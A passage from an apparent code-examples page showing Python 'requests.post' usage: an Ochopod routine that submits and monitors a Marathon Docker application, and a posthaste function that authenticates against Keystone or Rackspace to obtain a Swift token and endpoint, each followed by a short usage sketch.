                        
                    elif isinstance(token, str) and token.lower().endswith(' tcp'):
                        protocol = 'tcp'
                        token_no_protocol = get_token_no_protocol(token)
                    else:
                        # - TCP is the default
                        protocol = 'tcp'
                        token_no_protocol = token    
                    
                    if isinstance(token_no_protocol, int):
                        return {'containerPort': token_no_protocol, 'protocol': protocol}
                    elif isinstance(token_no_protocol, str) and token_no_protocol.endswith(' *'):
                        port = int(token_no_protocol[:-2])
                        return {'containerPort': port, 'hostPort': port, 'protocol': protocol}
                    elif isinstance(token_no_protocol, str):
                        ports = token_no_protocol.split(' ')
                        assert len(ports) == 2, 'invalid port syntax (must be two integers separated by 1+ spaces optionally followed by the protocol (tcp or udp, defaults to tcp))'
                        return {'containerPort': int(ports[0]), 'hostPort': int(ports[1]), 'protocol': protocol}
                    else:
                        assert 0, 'invalid port syntax ("%s")' % token

                #
                # - craft the docker image specifier
                # - if -r is used make sure to add (or override) the :<label> suffix
                #
                image = cfg['image']
                tokens = image.split(':')
                image = '%s:%s' % (tokens[0], self.release) if self.release else image

                #
                # - note the marathon-ec2 ochopod bindings will set the application hint automatically
                #   via environment variable (e.g no need to specify it here)
                # - make sure to mount /etc/mesos and /opt/mesosphere to account for various mesos installs
                #
                ports = [_parse_port(token) for token in cfg['ports']] if 'ports' in cfg else []
                spec = \
                    {
                        'id': application,
                        'instances': self.pods,
                        'env':
                            {
                                'ochopod_cluster': cfg['cluster'],
                                'ochopod_debug': str(cfg['debug']).lower(),
                                'ochopod_start': str(cfg['start']).lower(),
                                'ochopod_namespace': self.namespace,
                                'pod': json.dumps(cfg['settings'])
                            },
                        'container':
                            {
                                'type': 'DOCKER',
                                'docker':
                                    {
                                        'forcePullImage': True,
                                        'image': image,
                                        'network': 'BRIDGE',
                                        'portMappings': ports
                                    },
                                'volumes':
                                    [
                                        {
                                            'containerPath': '/etc/mesos',
                                            'hostPath': '/etc/mesos',
                                            'mode': 'RO'
                                        },
                                        {
                                            'containerPath': '/opt/mesosphere',
                                            'hostPath': '/opt/mesosphere',
                                            'mode': 'RO'
                                        }
                                    ]
                            }
                    }

                #
                # - if we have a 'verbatim' block in our image definition yaml, merge it now
                #
                if 'verbatim' in cfg:
                    spec = merge(cfg['verbatim'], spec)

                #
                # - pick a marathon master at random
                # - fire the POST /v2/apps to create our application
                # - this will indirectly spawn our pods
                #
                url = 'http://%s/v2/apps' % master
                reply = post(url, data=json.dumps(spec), headers=headers)
                code = reply.status_code
                logger.debug('-> %s (HTTP %d)' % (url, code))
                assert code == 200 or code == 201, 'submission failed (HTTP %d)' % code

                #
                # - wait for all the pods to be in the 'running' mode
                # - the 'application' hint is set by design to the marathon application identifier
                # - the sequence counters allocated to our new pods are returned as well
                #
                target = ['dead', 'running'] if self.strict else ['dead', 'stopped', 'running']
                @retry(timeout=self.timeout, pause=3, default={})
                def _spin():
                    def _query(zk):
                        replies = fire(zk, qualified, 'info')
                        return [(hints['process'], seq) for seq, hints, _ in replies.values()
                                if hints['application'] == application and hints['process'] in target]

                    js = run(self.proxy, _query)
                    assert len(js) == self.pods, 'not all pods running yet'
                    return js

                js = _spin()
                running = sum(1 for state, _ in js if state != 'dead')
                up = [seq for _, seq in js]
                self.out['up'] = up
                self.out['ok'] = self.pods == running
                logger.debug('%s : %d/%d pods are running ' % (self.template, running, self.pods))

                if not up:

                    #
                    # - nothing is running (typically because the image has an issue and is not
                    #   booting the ochopod script for instance, which happens often)
                    # - in that case fire a HTTP DELETE against the marathon application to clean it up
                    #
                    url = 'http://%s/v2/apps/%s' % (master, application)
                    reply = delete(url, headers=headers)
                    code = reply.status_code
                    logger.debug('-> %s (HTTP %d)' % (url, code))
                    assert code == 200 or code == 204, 'application deletion failed (HTTP %d)' % code

        except AssertionError as failure:

            logger.debug('%s : failed to deploy -> %s' % (self.template, failure))

        except YAMLError as failure:

            if hasattr(failure, 'problem_mark'):
                mark = failure.problem_mark
                logger.debug('%s : invalid deploy.yml (line %s, column %s)' % (self.template, mark.line+1, mark.column+1))

        except Exception as failure:

            logger.debug('%s : failed to deploy -> %s' % (self.template, diagnostic(failure)))
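
Once the template is resolved, the deployment itself is a single POST of a JSON application spec to Marathon. A minimal sketch with a placeholder master and image:

import json
import requests

master = '10.0.0.2:8080'   # placeholder marathon master
spec = {
    'id': 'ochopod.dev.web-2016-01-01-00-00-00',
    'instances': 1,
    'container': {
        'type': 'DOCKER',
        'docker': {'image': 'example/web:latest', 'network': 'BRIDGE'},
    },
}
headers = {'content-type': 'application/json', 'accept': 'application/json'}
reply = requests.post('http://%s/v2/apps' % master,
                      data=json.dumps(spec), headers=headers)

# marathon acknowledges a new application with HTTP 200 or 201
assert reply.status_code in (200, 201), 'submission failed (HTTP %d)' % reply.status_code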

Example 50

Project: posthaste Source File: posthaste.py
Function: authenticate
    def _authenticate(self, args=None):
        if not args:
            args = self._args
        auth_url = os.path.join(args.auth_url, 'tokens')

        if args.identity == 'rackspace':
            auth_data = {
                'auth': {
                    'RAX-KSKEY:apiKeyCredentials': {
                        'username': args.username,
                        'apiKey': args.password
                    }
                }
            }
        elif args.identity == 'keystone':
            auth_data = {
                'auth': {
                    'passwordCredentials': {
                        'username': args.username,
                        'password': args.password
                    }
                }
            }
        else:
            raise SystemExit('Unsupported identity/OS_AUTH_SYSTEM provided')

        headers = {
            'Accept': 'application/json',
            'Content-Type': 'application/json'
        }

        r = requests.post(auth_url, data=json.dumps(auth_data),
                          headers=headers)

        if r.status_code != 200:
            raise SystemExit(json.dumps(r.json(), indent=4))

        auth_response = r.json()
        token = auth_response['access']['token']['id']
        service_catalog = auth_response['access']['serviceCatalog']

        if args.internal:
            url_type = 'internalURL'
        else:
            url_type = 'publicURL'

        endpoint = None
        for service in service_catalog:
            if (service['type'] == 'object-store' and
                    service['name'] in ['cloudFiles', 'swift']):
                for ep in service['endpoints']:
                    if ep['region'] == args.region:
                        endpoint = ep[url_type]
                        break
                break
        if not endpoint:
            raise SystemExit('Endpoint not found')

        self.token = token
        self.endpoint = endpoint
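
After _authenticate() runs, self.token and self.endpoint carry everything later Swift calls need. A hedged usage sketch (the token, endpoint and container name are made up; a container POST is how Swift updates metadata):

import requests

token = 'gAAAA...'                                        # placeholder token
endpoint = 'https://storage101.example.com/v1/AUTH_xxxx'  # placeholder endpoint

# update container metadata, passing the token in X-Auth-Token
r = requests.post('%s/my-container' % endpoint,
                  headers={'X-Auth-Token': token,
                           'X-Container-Meta-Purpose': 'demo'})
print(r.status_code)   # swift answers 204 on success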